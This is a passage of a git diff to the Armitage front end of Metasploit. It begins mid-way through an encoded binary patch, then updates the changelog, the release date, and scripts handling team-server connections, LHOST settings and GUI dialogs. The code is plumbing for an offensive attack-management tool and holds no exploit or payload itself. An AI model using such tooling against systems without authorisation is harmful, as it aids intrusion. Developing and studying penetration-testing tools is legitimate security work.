z<(qqnfs(y`K`Eb>AbXmlqXwCXe$L~fSzaPP1~YWlvgoxCxr@JG6Vco!Oq3re^YDgQ zdkYv)miB&D@{=OcF{1ffTBt6dU~`ye8oMlt^unke>n$oN>x<HvQiA2s)u<m6ov1c5 z8;{!x)6*TNpR+mwsN7+_lhhfykN?%h2Q99L><uxoZ_+0v9a7l@&?Kb|x`mG%#)&={ zf$kMaykHu7Nv_iRK$x~8^w>g=sY_lcsje^VRQZbhSkL)^&1+47*zcHxm|k6GsF^6g zx(q`ZMLmrT1^C-U&_BL%^(PrT)>(qRzIVW{56{19jOtfFujzOf<4wta7`$8h$#eKy zwHCK&^nXP!`Z7^IcxU?|BJBehfPU^Lr%w?>--VF7zdVVH_J=v5-i93N*tpY4^GH6V zcKP^^wg&2Og*m2In|FFz?JxJ((<m(Tt-t^`D)pD`%iVl0eG7uU9pz1jr@+cwv~hrZ zY3v>V1*)nHb*1@0rR+Rs@$d>8HkU$yY2}ZranWnv6ue*x4%FbNe_2_<;=ghem<50S zq+m@gF4`ZWQdgT;77AuYaWwmz0(I8M(SJh0%AXW;#ZN0RV`E}%tf{oD98~*2XsJ<; zv!Vk<et^!a;_=jt(6Z(yEp8MU0GG{xq+~@pEC0CxFP|GI21$PCzW$fnhcRq!X4fZ^ z)SlVcAZkZ5JKETPKSj1@(asAgaC>2mAMfy}IV<EsQ?ZpG)w(PQwRY%FyMjbNslvo1 z8A<D4EK5Sun~WVp>3xtq1NAD0VsnR4wQ^##aC#(-EhqA$oGTdP^sltLoaj@I-L%wQ z_ju(lbdvJ8xN1xqkTlB1Y{-bd*z1v}H{N=mfi7rgM_j{AtL{CCDwdbWtqX0cj2aVQ zW_GK|k1Gxvr_reLB0uq)RvtOsalH+-+GA6O6yCCv3m7bBNpQLEC)sKS19sRbOE><< z#zPv1xQ7@|ze(b`)7fD8YFS)X<@*tVy@BAEE_}4#ml`5RuV%rH&#NGG6Am>MO3tBQ zASKl>C<H!hdyr;?$g}b%Lh7I@@IPBIa5C}P*fVr8MC2!_3sFpQ=e!M>--Eq|8@GF* zXD`==QM++I4Q?`gGLy3}P;98Em%_Y%RK1dCP~X<^N6R9v(5g_8uiGp?xwOL;Xb3?Y zOy_gW@@;7FOStyV7<oqW#x`>A18B5{#im_ecgKceUfFn)rl&m6`W(GIl^u%w8-J#^ z3e5^=SeWdF!RH+h#G+>Lr@rI(l(vV7AyP|rsAo?Zj<%M?wanC6%bwAfFfmF|^R*3S z3#uB@oSP<xBUL@#N>DjE9*$ch{TG??j}WUWj+?2dwv#H54%EQ<T2gh<g62esp28}D zvLeLRiiH{#1yokKkXKoiBW=`+8hTV#r9sm2PiAtGqby+)sB)m{zd&M&R>TQ4CmGKU zS6R?*EvgRo{0?czK_`YO;{9YORww?VsOJA&z=F2w#7YXU0Ar{`Cst5=`35!8i?tP- z0wsYUW?YyeBS@k=Nnb^!WCsSqghl13ya?qttEecpvC4}z6&pGtY+PSeg0NC3ijfM- z+A50dpmL@;EzuJHNT_QYB}4I%Vl_onU76YvDOOSV)R!n6K#UX{D)u#yC@+eyfO6+r z%e-R|81^K$?yG<bkH)LWag?eIy{-TaW<6zU&Ipy7T2w^AhP@;xkZzAu+0#Y_t?Vs9 zB6%*t0&I3PLNx9-lMuM}l?!eD4M7@E35B}%lT~l21jCp2m#N^f(CSbb0#^peP}|C4 zHNj;N&8;l<5<-Wv?-25;BGwYx4P!(wB~?M}l#^BTdL0tsSQW9l;=%7SHH6R@eN`w- zO_8C*s$xyW{5dk^u?l4%AY1;ZD!kBlfy{jQ2OK>^L^!Hc6Ftpw3s?p20%}8v)e!vg zsghthI$aGlEL<uVv#T!FS5!)qsr_42c66;iluWIT%w4$}OaEeX^Jr>S4a!dJ1Xoi7 z#naZy1<LPLAwLWzjjMrD-kT|)j);S*HN=|2ylhT*9!BG&Y?*abrJ))%MU_x)2j^uU zg%XKZa8hNw9zA7`K>*84HR0UW`#F+#7Rjfrg_JyVkRyq;#JWPqBL>2P&ejs6gsR7l zkkHytVTP4{X5OqkZjszo|ELYqPhH@=_77C9+@c}|E3R>PZh^{!!|kI0$LASfE1DMt z-P*eh@uz|)v5Ii_J|kj<N{`vMH_fX9@Ld5T%23i5l{-@<*KQRJeNC~NFY_!YDjNEn z-ZI3UqU(wdlpZaL!UJPuqNUoJzDC0f^FA5`qlH>uII*m*7;Qe80-{l$os(K>kzAj9 zJ=7OtL96SDwJ4z;6t8e*M518hLksGQ)v0-XvA*!yml4B+z5a};r`&~VD~gIiek`x4 zHjY%KFeZQ&)l@ri52gQt8iFG^{8v4-)LLveGk9VZ4u>~D*Jy+p7%Q680O=Bfc@QHm zHNgC!1tv9&&^83I2GbTs#5TswOGZNk`))HMWLh`13&k~oWz`y?29FpcUQWE)jq^4# zUdPr(ysy3B7pa^N6bp;n8F(Fp3mrLeu(8-taO`T}cv7<_NUdevjgY9sZ*|;j0zHp< z8u7$tqKc|F6>A8a`}_!JHx*k5j|ZB<Eri%aBP6>SWNwc%Ld51`J>mHTBV=uJv5pXt zY(PAWVinN>7L}RBd2uaJbm)8oVMzyCAk(TY=7^>xTDFTg;h(Lxqn24}X#~f~#FnD3 z5Wmd8bD*LPYDeZhTl%<F?P7EWd`Y@N%9SNdm~bH5fGBBZ3`Wuo|EQ@|F5G`T27}_Q z9El1feJlnT)nPSFx~TT0v5Zn4ktlb{iN#gQ`lLj;kxMI-TlrW`j-S<Kr3nT7+6oux zS_Nv_R;0#dtPS#E))%#gZnP3rigHiYwET-YjJ8Y%9?%-Yr|KDW6{|z(++;w%F{u1= zHLdun4#4wOfQ|wZHWkv{)?#zv&<pnMxg^Hcj&A|R#^Vaow+%$%K1wVqRN6YQdcy?z z#F5u+#EQbS&x~**joQ|oHn)Z1QBJnT9Y|wN!#ZF~%1&*IQ&>*6PE0Dy{5>VN!L<8% zTjYCNoHFVF9k;!0op}@bw?oZ?Y&pEVoruG7cAR+G4h8(3II$tn7AMNPqSC(YQDBxg zhnKb&D+|5>oLFDM)|QsVLB_lTWU|V0xMBzN(2F6AXd-mMelIiNVQpJic1_2cCTssk z6fnO+$?efQ<LlVs>}E$a{|@$pnJ^F~t!s;aE$axy-gP;Asw1quSdSC_oiH-4ZNdqC z7h7p|sG*wOOk8xi85fA_W~-)|17Yg@PSALwxdFB$&(6r@fiWD(=`31NVrS^q#~P5@ z!tz#}nA8O-D)qAUq&gGuuNGaPtVcToFIxD}i4JuUTMAxX$+4^0T6ooqeY?~6u3{y@ zWgwSKA7|^&Bl@W;6u1xPaQ0lpal;fO!;^kc-ntuj9e*?8&FKca%1<yLIQQBOZmT)j zfGFwAA_PS`yCFHc!!i?pyq<0(I;T5=xps~bQgs!w^ksMGR4+1u(=u%_7_nq%69=32 z;H(r26YN#eoH*Fj2RrHv5#vQ0dJu=Ej>PFE8Ho~p#}>Mwz}$GS+u+EO0l611Ruw92 z;>f=Jw!Re8113!Pmm}7ffox^S$I~2n-2<8R=8CMMCvK1H^oNfp_Jnb{Hw|z@p=Z8< zaHW=m?5ruQ7xdJ4V1QjHsTZzfUrIP~yqDNe7>wJTfzTJ+Tda<U2DbIWwJ<%vPBKD6 z>w2S>lVzBQ2W14<*-(5K4)eY04aHgB94->=T&Zavv4XI{#|YWf2ZQnuKLg@L`o1Xj z4>nDivc}EqG(7Z+`=XAgH935uFZyL@T~6$3ZRf~k8uo)s?fM)Z*AGz$Z^((${m=*@ zmJ{=O*m=;<o`_xh{^)bps0YdsP$x<#w6&(wjO9AW&Uj$i+R0GX$>25(xg?lKZNWi% zX11iOMS`6_?-Mfzz^-vU3_M5XVK=&Qz@+fVEli-R@b7;1?MD*_A{TW>d8xAlabX(p zA16WvAv>DkRQMpVyRh&$9U3II7v`R1-=5@s%g&k72eZ}<Mzt|GsX7RiUC*;~V{n)- z^9(~==*|lSzf8WJ3zxPT0$+5bVS|x7V0rW7TT+j?^4`SI#0Qi-1k;(7PuO=TC93Q- zq#cS2VuLqE$cCW^(#1~(#Eo5BG*l}A^@LI4P*F#xT<l$Gc>;`jgM*+$MJ+?@QWKGW z`8c>a6w1e!x0meJkX5L?aYQoQ>FzMx3)Bp?_vI~klZf{2^WboYaFmlO>@o~+2X79i z4}(!5evIg+cpqR-=cnjBQft{OY4C7d28V|k5Jx&O9ER=G(#sK|4>^s%_2*qhPV^pu z+!|Gb5x%sSaTZ21qLr|<A(x2mXs@CHBcULwB}dN1*{f+kLyorPh}EwMV{B)t^Q+iF zXc))7-6%KF-k$dT3bEGx8RAM`A*KkxuOcs)WFJcLqi|p7JyfD<(AiPAuDd5nR0swB zh9-QNE>VFrcNt7*IvOrt^cyb7{btH|>2iAy%D?;Vx>L-Uw`YH6DrsW6JswFM4IBPW zrQFeCIf`9xZ^Lyx-e?kq<mF5tUYNXsee0>*W_v$M8iS%!Rxw0JH^#uI@T0PRaV#dG z{^9g`yck4z<1jX^8Y})Hr0b24I&~fJtXl3j11pY0{02lC35*|yIqs&42Bf;MZMuQ5 zq2<MDdp;9!U*}+)GTW9gDIIMdk6fLc#)#2Ea3%+rO~4T0g1w9hVmD!X5d+;R%2tEp z+7r>7U<XQ0Ml`bhHJFNR!F}(++1ReUG*R>rt~+vGw@IQSxlR%zg)>eDBv$C*Y9KV! z=M7E~OTFspB(y6(ob$Yr(7#LTbE2?=Mor_BFole4V1(RCLhkl%Xg~sZ+V@F@p43JR z?kJRL%D#gry9<^{q~Lo@2HU;`hdWKi^m%!EPVAYCSj_9f3BM^&ZWYgo^kEtYJ~vuB z1*Mzzp+i&PmG}6y-(+|tDMjN<O{c;ubtW*xjbhj&Z{<`d_e(NDN~Vg{g(Fi8NE4yS zbgDZ8_T~JJOWxX<oT$Cxo3XvqG{yldnZ*Ur$5oV(rm^BZdf_w}<+XzIcHKval2TCr zCk7Y)!QpDt(VjhPIk9Rw?9gp95H@t~utv_2E=NtOe7~JZbrV_~!ifyrZsuJ;EJA;S zdes#Z!OSCEz+om@;{G2e)?L-O^BM1qnJ}i`2@W4*GB+?lGmQgpX*9eY6;dEm{(=mr zAQ~wbIpO&bdh%1?VZ~*R1kXZy%3NhcIhr>MBV_1ZMsyQu-sckOAK;&Qv&F`OJq}5- znt<5S^nOUn*_MtDM)wuv-f@BA*;qL#|4BnJb0Pk>jiW1{gL&CI8ZW5rES4o2+B>>& ziEDFUy1zNKoQt&?@3}B%vJE5R6rN6wRCgLqn;w~qaciEtOhtz~;*qIPl&>`pW7gju z-*Hc)OU=4@7>$CxWoEV(g`{J|pXT9?#M;l14n1%zM^W>!=(eN1OttLqsHBYf(7G{E zhTbrNMQJjn-3kG=(M|CSaPO6~j*=FL9Tm+lN_;IT7ou$DS6MpB!AU9YY}3$%sB~9F zCthi61K|6ZsBaA!vR{O1Tw2N0mYz;(8nFlhi4$e$C=;kKPp149gR<R^vEi(fmInTV z5pK?6R59tPEZ|WL4YwCVLnLlaq^62XFbjC8rPrzGW)qg+y0fAtCr&NFWU3&F6RxSq z@Jsa=QHJ8%I@|LZ(afIC#{DU<6&Kjr(^<`$sG-ZLh~v->3~nLhbmi=(L!E8;0Gvqh zSI;;Ozesd;;5RqN2&K|`(}Ja#aC{})gXsHlV*hB!e7~vr6#|0YK*oy^>LzlTbIHzj zWV4J7s>7LPH$3`{0eRV2POM!9ec2N@QM3&0+P9KkufU9D>vGYaniScUp@iiqU469y zjuHa@;>7JEX#1c<C=FhLy4!Czz*y;u_;yX1%y<KLao%4mP~pJcjEEJg?B`(obiEaI zTZvh9&OrlWLHMm2t+ejFZ~Mt*u2>yEgFn+X^nVYNU7Eax-nV(Y*{2k9vmH41WxA)L zIzlmNVxY8vdbVk|))TPvG82EMYxk97Tq(Z4s|)4CyW-)dG<mZtCk=ZK&)Q2oZ~6pS zvMJ@$gfmC5TAzS@0Mq?~4@W2{T|WQOoE^S=d5i|6i~Mytvlw7`ht{Wy{KYh<88GQK z6{O2sB$`zK4%Q^?Dp{fx13uNFp{wK*g%dM3IxN;(nH5yF`eCc(x7xI0m8|C`D^_O+ z9_keNJ9m6C04!NfH8Nydx-y{ERT`5a*ObP9b(3jthFm0{0h1!BI78lnSl_Sfh^JWl zXJ=JRecYh}{jyr#G8?!W#YR@7>8s_#DBBpYw-TL&gyg*wbDUbv%EPV=ju4pYsTfU; zf5=k0rhPq<u`fOXM;c6}Ui(m6NJ)E2WB-8iwV_0R$X4%TKw<=4|3eIxV&1OO%&|UM z=4R7&nE&7~tM}z8V2xbet<AY&42}t{MqQ>`SRK--_Zr!+v(_LVZe)f~%&w3!c$>bt z;G)2Oj8bWaJwVC@S9mg=3fEv@VSr~Q#AnP6r8<9wdXQU2s6EAH%BeM!@h*|fTbn8J zJ^o5&JF90QH#@ceF-1>iNV47$KU7;UYumUBOYL!nEX>RdhpP;q%;Zh`$bYREAbI`R zy%jl8@a51}Kkgs>dWw3il@GU7zIW>O4eVb&t?;AN{RgxfQj$+6Uz}Ov5}b7flBUio zd>=~p*2>-Oa6-ZS9Bk1!;G~Ud*L`0cO6C6)1Ek*%UpURHw<oqu|G~yDnql~4CO<R_ zGyIx(zh4LFMhyP3?fs&i3f!<O=7Vi1({0yq&G)kX6Gn_2@qbF6@v`t8ei0F`+>HNp z`M0_=lM`I&?w_KM<hpe|8tv+bcGN|8H#IOJoP5`b{B2OR*CG0Xo;t6Si@h21u+~6K z2F?WjXq#UZqIIIL<jeIRnr_dA>FzkkV(QDk>xI#wwqfp6xK7TQVphe9HsrBh4p&~C zo2z!gq{-rsq2JS;I<1#OAO0-*@Ck%VKoGDGYWQR(XAGg`>*Wz)-+CnE(ve{#P7ibc zF}G8*Q1k4m<dY@WTsAEwbrBkO1;>p{W4mD{b<2{6<+6KLc58$k-p}YHrkyw;l~!em zfl>mDbuN7QAA%SRH<)g17A*fB#1XxQ4@msKVQhD1{^wj2)ZrX}Y5VdsjLP>JKB~{~ zAF@D-@AjSLqt7C~QOHx%4s;ujkZ%wJy0abrcV7OFKB2`OLw^is-rq*G^zSp6{p$UX ziR$iZmp=!Q3JU+Rjf$gmXM^n3H%~L~6u^=Q_{+2<2QQNUM)~YQn^z->#~@c;M*Wzz z*RE3BMv=d?Y|=)=bK;9IDm4#xqwO0pCdGchgUmMJzEr{}<wuEfrwmoN3xD)KdMjHX z-h`>)+aj4c%RU^tzndW6sZ@quZo*vQG9EbHjr+7Zo3Vu1!IBemH#3ekCvG#Mt%?)6 zEx2bHiRE5aX3`eikmJdCi8#XuB_0-KoV2iT+%uoUglTj{xbch%PnJjmD<Z<}>DUek zRM(jZ9P{J?U3KAhT%bmziNJ9mF3>F!8vL^{ud(*$$jXW+GL#`#%W`CEHX8Ll$UrE` zY8$49BZG~Q&fBmY(I?ah*|ZH4#S}bp#9HE42TDJ)eOt+?PJdw{6rnTltf}c=C_f#K zAIZ{q_10gwqpe!W2zmM!G&ZSXKrE@+c9a^9=Zjb=>*i?6{OvG&S`ChPwG4NlI}Ayy z&5?i|h{DcjP7K=teQupOv2h42lxFLag;#gL!k~VP=R=yEFy)a<#P7r%^85ju1Hzh) z?1X>L3^GE>?m`rY3^76`F~l-~A!X^tE|@J0<3!}&m|brj!HHRagLC~?PK=uglV1J} z^B0X~NFYV+h9NV@GNQe(b37M&wi|8gHHj0A_aHLslR43JNw|tO?ty|OQ#tZ^56p;} z&WW~rQFD`-oY=w$+u1U)D%_To&yiO_|G*Cm@rW<8yXQY}SkZh=tjr8o(!qbA{MABQ zy$@{reNb+-gcAeyL0=s9qV|cMg&gcVF^Txi2#9V!%KW~PY4M@o_QUuScwTomZUxWo z#~q#B2HKW`g-E{~wDqD)49`KQloEYO4h*`tiOF;j;<vGH|J0-5&Q$vV)LQT0g=ZXq z8=CCm#O(vP56;-bi8^QCliCL%J7AwIdk~fmJj{vwgDBYjBqzS+A)};6xTKtDa|l&$ zIm>x-4?*dI^PCVL!e1{BLFpsBH;Gwa<1hkgeO;D4j0AadlM{~*!%KZ`bE3|_sIJN# zPAvJCty0}%gfHd154U266g8wif)S`fNjQZZ5nC#<ai%cRCjt+TAHgWp##W--=&4@> zj!EFX5WItxD;r@vUTnuB?MHEVGU_ONI@W;^U4=<_hW#k+qdy)+`=>i|LLVGqOVzKS z+7bVuwPtR-VD^95N>Y^Jgu^k!>=s5CrgDNV!iGntfoM|aMeI}^#di9^V_1o^35=kW zDiHy4QXPlt4M7xr9Jhb{%CT>6+ISqUcwU|pC5#9U<HWJr5!e}KH_}oVhMhp^AzIGM zIstF?uOOE?ftZw5;zaC8IQ?B!PRwr>p{9^0XjZ3|5gJUS`6n~^G2LaAf5O2RMNHiY z%559rOHEF}wbSZHP;}=AFIt#@n?R}NtW$_Y!(U|lUWW)bwxX#a>(jswG?efFR$4<J zdz(1pcWhgo#(iGn*6iDl9``|$JZpXnmv9D6s)_9@#;bh>?%mvh6U_&~@b7JZG}uJ# z$WBZOFB&_8j<dN74Lb{mN1a8Gf9=YM4nmpk?AwnD&O+j8AM!efTjJCGXz)4gjXfAd z`_3T*i-(drS8S#j@>>MGNQo#%6LaB!(_<rO!2-Br(A)?YwxuBZzc3fA)l8I_L8Lp6 ztgkkeww=ck-8q6Jdj}u)SJNyLYp>zy-t*Xr{Ueo1&x_53w;9y@0+wNiWzp*kIA^>0 z0`AB0#5{=ZLR>brx`-^@vV+l{wD$&XuJbRV>e77?l$0A$mV7Uv>Jf*j=_Ryf@?~0n zNo=7wofknZUPqLns)bmA8uT{8!RU<Er~C*?E`p8oFJpJH$z=q+(*5sHRfXAOiSlLd zN5j(IWmK2?RDy82r-XM6c&1Q>CSJix*7a8rwAxzhO6RVK6&3#PB+8HXiAq<Y!M-Sh zT3r=eDP|N)|G;^ft2jPwUn1A6zJ@bUx6QQNw2s%HCDcNua@@5l+H?)!7-20#h1XDc zf~`#L571gu^mS~lhuD9I?2MADe3;gFS#5`#EOxf0){0`nw7zuk1{&*j1E%)${()&l zL*B#j0~qsN+3!pnT605eq^KV99daPeP1u<qE<>$uVkPdnPNrVn#H#!Hn_{GS8bz{L z0;sDf!sd$<5Ku~ry@h~muPj52n`mvxgY~cNw@~|#sxtoI7TjfDQ>G&GK>63!(&|{P z4;QCA^rn<L)GD9NJlbd-Y5Z+yDPZs>JXz0R&)ZmivBv}Sj2L<wLq&KaMtIPX&RPvG zaIL%6co6N|j0==@*E&$#18A(A4~=tLGPt$yZ!6Bu$;Tixq%|k(?qD2y*_IJ*)cFnu z(bjmro)KH_pw7h3jKF^UJ<*OPC1`DENh2)OCmq8Yf7o5D@#o>$dt(7Nz6l_WMsx0> z_Stbp0=f}e7d9ecx2=}}ZZ0hCXCUlo{ylWE`vVP#Exo^op<&{1j?}u3!N+nWCuZNr zj>myfoVa}-<5%y|2Ev6}wnGBJ5jY<*fx{UOP~hVv%6lNTQEX4rQl-UOf9d%ZJ|OgZ zh(I2kqNTcov`c@8bm{)PmhzWsL#5@r)JItOE15z5kI<v9&ZNXgVq0Nf3j21!dq=c( zMpxsHkDx1KmX-omp$>lOdyL|JW>frQj4l=C(B{V&ZHlFDZ(6z<iGYhHE&+d-bcn}u zwbcI)gAO+7pRvXy@@_bB^F(YU{IZ;$KEdy9yxOj%VaK$7e0yICM*ji?qy8?MT7W9w z?4t_>xK`gjhL%1+OsYObVjs+vD1S<MigxQSN)!$kKScu1yCO?^J%j)2-=y}>aI`P# zj+PF*MOx!Di#(*Bc!pN*zpJIF_u8`j>Qm-9pjVGzQjr!<3p{6IMS(;))7<AcJvjWi zOkI19s%jN!$+1w3RoIniX|5xFbyeC|ihYEfTU;o5D3Z+agtDtn*51}#XWR+yDJcI1 z(%0n$l4hz6C%V2smY-H}BI^b6|G1hFO@+s{Wd2%oOMNA(srgG}d^h{=KuLfOr-EK0 zfBts(hSn4g`?7!g;{2$t3?D=XRx&Z+lRp>O{|cGxf=9exBUw&GQmfZuC&8)``}U^e zuVG)WdXiewyn$06Hl${6#HNbUPC7~&qVp%u7s!R<Z{WNG-E|Z_9FR1_bbX6ZruC%A zw;14R^~Nh6f75x>=&O)k$5@X2DER|U`^+1!v!t7EaW_!h-+-v8`a3izXAnn5zk@S= zAIgbCjHo}16RP*HzS9U!JfEg>qE2iSp7I_w;5C#|4e=>DJ38<l`hFY3k&^fD^x|Yj zxKNW1n7B>DKGz3%adG1Z+~k%_)zPG-XbgMfn6#)8r0X@%3F{8|Sm-r<#N@#5X!tUu z0DC8bboXCN8`0<-<aT2T%JjXlb}7{3BXWx^<<0$w1rWD|wDF^S=Dp*(^pxvZ32lzs zb<-zfCZ*ELkMff-exG39lBK%T4LT3fZ_-&)w@>n7&S1tGxSX>Bd&wvF_b{~LN{-^k zft{uHwBM?!R~f4ZRq()?=`(8&)0k)(nz&8J-z6bg+v+p4wA-Yk$WuBO>3vDk%aYkI z2~+xKJiAt5tIRv~S+3&8U-<n#VO+mmmaTmZ_On-WNXpo+hmx)c$~ONk33y5G=aB6E z@z)%`D~sPND_c_}S8VcAfZqi1otZp%pN?LigX3PIPN`j`MTmlUn!LY=p;ARvKbSx3 zhbXXzgiKfTOV8+N*<GYDdqJ>Nc)=GGUUiPPd=Z1C2hG2nSy<l(SyBV*dZw!_%Ii9_ zUkB*xwq?IUxgbGw4QDGrdiv|Xt_b(9SW7dNZ=3gBz7HK-qIW6J3Runl<>eq)mV!!5 z3*_J71<0;Q^pKRh^;yyS7L+F;6-{Nw+&5M}?4jO8%G<;19m98`z~`R|OnpqRi{-VV zqLVGMtH1=d4r{8m|1%Q5ihhzC!&X+Y`hZq-MUJ5x7(SWFX9{(c_*Guwoc9%J^$I`Q zu=%U}m~*vZF>~0HAM;R!=>p&W4?21UF+Fp{sR|+PX%L(Lli0jZa^w1p9@%g}pTWIp zwT0*+8FjC6q}4hU+WJ$WIJ{9}REfOezoG<2RWH`jo^Qx)h7^_PsJKLahQzNFq0bel zR;k>QE&vqn7I+W1yWW-Nmdg2+#^fBWXm9DaO%Mj0RZ?*&*R;eh(o2z~)>A+L-l-(| z;RRCP3NIM|)^t0G<@5cu)ccZMGS8wF-Uxu{@G{R~Np7Sxx-9vMqU5Nj$Z~kMCVR_` z<bbr)_pcYC@n4WWrbV|q%NC3?kK~V4Eii|QNp2GCO1dy?s<9{Bq{P1tp773t<_eKz z$X<x#`J+7Z<jD*ebq;Yi9V2ZqIx^Ay74VuUL-!dbKuc~}#^OWbKMWXCo~{Xz@~ie0 z0EPsURuRb`yT7pM-DUP{**P>K(2!KDYu^c_1Vv<|l*p?ZYz=FJF6fWsGhIqP7ETAD zD}<%c=gaS`lAt3Mf2NDH%`53yXKmJJ49(Bgdq}QZd+kQue<7(u?UnKU?UR}OwUVAT zH^F<0vKzzK?1~}zXr=}H=UheN`AIKGlx%Czw0`CB&`}?bGJQVJsTRdrMe@ga$62A_ z|JBB;!Xo*@I`I+rhp`v5u%Mg1dt_D=-LZ<~uUN6MMxC3Z^%OlA_C#CD;fet)Os!9Y Xtt0*IFIil&Xg=TEEVv2w2h9ElMPvG^ diff --git a/data/armitage/whatsnew.txt b/data/armitage/whatsnew.txt index c1e03e579b70..55804871ffbd 100755 --- a/data/armitage/whatsnew.txt +++ b/data/armitage/whatsnew.txt @@ -1,6 +1,29 @@ Armitage Changelog ================== +12 Feb 13 (tested against msf 16438) +--------- +- Fixed a corner case preventing the display of removed host labels + when connected to a team server. +- Fixed RPC call cache corruption in team server mode. This bug could + lead to some exploits defaulting to a shell payload when meterpreter + was a possibility. +- Slight optimization to some DB queries. I no longer pull unused + fields making the query marginally faster. Team server is more + efficient too as changes to unused fields won't force data (re)sync. +- Hosts -> Clear Database now clears host labels too. +- Added the ability to manage multiple team server instances through + Armitage. Go to Armitage -> New Connection to connect to another + server. A button bar will appear that allows you to switch active + Armitage connections. + - Credentials available across instances are pooled when using + the [host] -> Login menu and the credential helper. +- Rewrote the event log management code in the team server +- Added nickname tab completion to event log. I feel like I'm writing + an IRC client again. +- Hosts -> Clear Database now asks you to confirm the action. +- Hosts -> Import Hosts announces successful import to event log again. + 23 Jan 13 (tested against msf 16351) --------- - Added helpers to set EXE::Custom and EXE::Template options. diff --git a/external/source/armitage/resources/about.html b/external/source/armitage/resources/about.html index e19056effad4..1167b175f417 100644 --- a/external/source/armitage/resources/about.html +++ b/external/source/armitage/resources/about.html @@ -3,7 +3,7 @@ <center><h1>Armitage 1.45</h1></center> <p>An attack management tool for Metasploit® - <br />Release: 23 Jan 13</p> + <br />Release: 12 Feb 13</p> <br /> <p>Developed by:</p> diff --git a/external/source/armitage/scripts-cortana/internal.sl b/external/source/armitage/scripts-cortana/internal.sl index c83929a79c1c..5ab90d72355b 100644 --- a/external/source/armitage/scripts-cortana/internal.sl +++ b/external/source/armitage/scripts-cortana/internal.sl @@ -9,6 +9,9 @@ import msf.*; # setg("varname", "value") sub setg { + if ($1 eq "LHOST") { + call_async("armitage.set_ip", $2); + } cmd_safe("setg $1 $2"); } diff --git a/external/source/armitage/scripts/armitage.sl b/external/source/armitage/scripts/armitage.sl index fe2af9a9ecbc..427e1c4a82a3 100644 --- a/external/source/armitage/scripts/armitage.sl +++ b/external/source/armitage/scripts/armitage.sl @@ -15,7 +15,7 @@ import graph.*; import java.awt.image.*; -global('$frame $tabs $menubar $msfrpc_handle $REMOTE $cortana $MY_ADDRESS'); +global('$frame $tabs $menubar $msfrpc_handle $REMOTE $cortana $MY_ADDRESS $DESCRIBE @CLOSEME'); sub describeHost { local('$desc'); @@ -165,6 +165,7 @@ sub _connectToMetasploit { $aclient = [new RpcAsync: $client]; $mclient = $client; initConsolePool(); + $DESCRIBE = "localhost"; } # we have a team server... connect and authenticate to it. else { @@ -172,6 +173,11 @@ sub _connectToMetasploit { setField(^msf.MeterpreterSession, DEFAULT_WAIT => 20000L); $mclient = setup_collaboration($3, $4, $1, $2); $aclient = $mclient; + + if ($mclient is $null) { + [$progress close]; + return; + } } $flag = $null; } @@ -319,28 +325,23 @@ sub postSetup { } sub main { - local('$console $panel $dir'); + local('$console $panel $dir $app'); - $frame = [new ArmitageApplication]; + $frame = [new ArmitageApplication: $__frame__, $DESCRIBE, $mclient]; [$frame setTitle: $TITLE]; - [$frame setSize: 800, 600]; - + [$frame setIconImage: [ImageIO read: resource("resources/armitage-icon.gif")]]; init_menus($frame); initLogSystem(); - [$frame setIconImage: [ImageIO read: resource("resources/armitage-icon.gif")]]; - [$frame show]; - [$frame setExtendedState: [JFrame MAXIMIZED_BOTH]]; - # this window listener is dead-lock waiting to happen. That's why we're adding it in a # separate thread (Sleep threads don't share data/locks). fork({ - [$frame addWindowListener: { + [$__frame__ addWindowListener: { if ($0 eq "windowClosing" && $msfrpc_handle !is $null) { closef($msfrpc_handle); } }]; - }, \$msfrpc_handle, \$frame); + }, \$msfrpc_handle, \$__frame__); dispatchEvent({ if ($client !is $mclient) { @@ -371,7 +372,6 @@ sub checkDir { } } -setLookAndFeel(); checkDir(); if ($CLIENT_CONFIG !is $null && -exists $CLIENT_CONFIG) { diff --git a/external/source/armitage/scripts/collaborate.sl b/external/source/armitage/scripts/collaborate.sl index 4a2cc2959c0f..2f302c3837e8 100644 --- a/external/source/armitage/scripts/collaborate.sl +++ b/external/source/armitage/scripts/collaborate.sl @@ -23,6 +23,7 @@ sub createEventLogTab { $client = [$cortana getEventLog: $console]; [$client setEcho: $null]; [$console updatePrompt: "> "]; + [new EventLogTabCompletion: $console, $mclient]; } else { [$console updateProperties: $preferences]; @@ -63,6 +64,7 @@ sub c_client { # run this thing in its own thread to avoid really stupid deadlock situations local('$handle'); $handle = [[new SecureSocket: $1, int($2), &verify_server] client]; + push(@CLOSEME, $handle); return wait(fork({ local('$client'); $client = newInstance(^RpcConnection, lambda({ @@ -91,9 +93,11 @@ sub setup_collaboration { %r = call($mclient, "armitage.validate", $1, $2, $nick, "armitage", 120326); if (%r["error"] eq "1") { showErrorAndQuit(%r["message"]); + return $null; } %r = call($client, "armitage.validate", $1, $2, $null, "armitage", 120326); + $DESCRIBE = "$nick $+ @ $+ $3"; return $mclient; } diff --git a/external/source/armitage/scripts/gui.sl b/external/source/armitage/scripts/gui.sl index 7f7f155f8828..d5dae2412b98 100644 --- a/external/source/armitage/scripts/gui.sl +++ b/external/source/armitage/scripts/gui.sl @@ -95,13 +95,13 @@ sub dispatchEvent { sub showError { dispatchEvent(lambda({ - [JOptionPane showMessageDialog: $frame, $message]; + [JOptionPane showMessageDialog: $__frame__, $message]; }, $message => $1)); } sub showErrorAndQuit { - [JOptionPane showMessageDialog: $frame, $1]; - [System exit: 0]; + [JOptionPane showMessageDialog: $__frame__, $1]; + [$__frame__ closeConnect]; } sub ask { @@ -155,7 +155,7 @@ sub chooseFile { [$fc setFileSelectionMode: [JFileChooser DIRECTORIES_ONLY]]; } - [$fc showOpenDialog: $frame]; + [$fc showOpenDialog: $__frame__]; if ($multi) { return [$fc getSelectedFiles]; @@ -179,17 +179,18 @@ sub saveFile2 { [$fc setSelectedFile: [new java.io.File: $sel]]; } - [$fc showSaveDialog: $frame]; - $file = [$fc getSelectedFile]; - if ($file !is $null) { - return $file; + if ([$fc showSaveDialog: $__frame__] == 0) { + $file = [$fc getSelectedFile]; + if ($file !is $null) { + return $file; + } } } sub saveFile { local('$fc $file'); $fc = [new JFileChooser]; - [$fc showSaveDialog: $frame]; + [$fc showSaveDialog: $__frame__]; $file = [$fc getSelectedFile]; if ($file !is $null) { local('$ihandle $data $ohandle'); @@ -250,10 +251,10 @@ sub left { sub dialog { local('$dialog $4'); - $dialog = [new JDialog: $frame, $1]; + $dialog = [new JDialog: $__frame__, $1]; [$dialog setSize: $2, $3]; [$dialog setLayout: [new BorderLayout]]; - [$dialog setLocationRelativeTo: $frame]; + [$dialog setLocationRelativeTo: $__frame__]; return $dialog; } @@ -261,7 +262,15 @@ sub window { 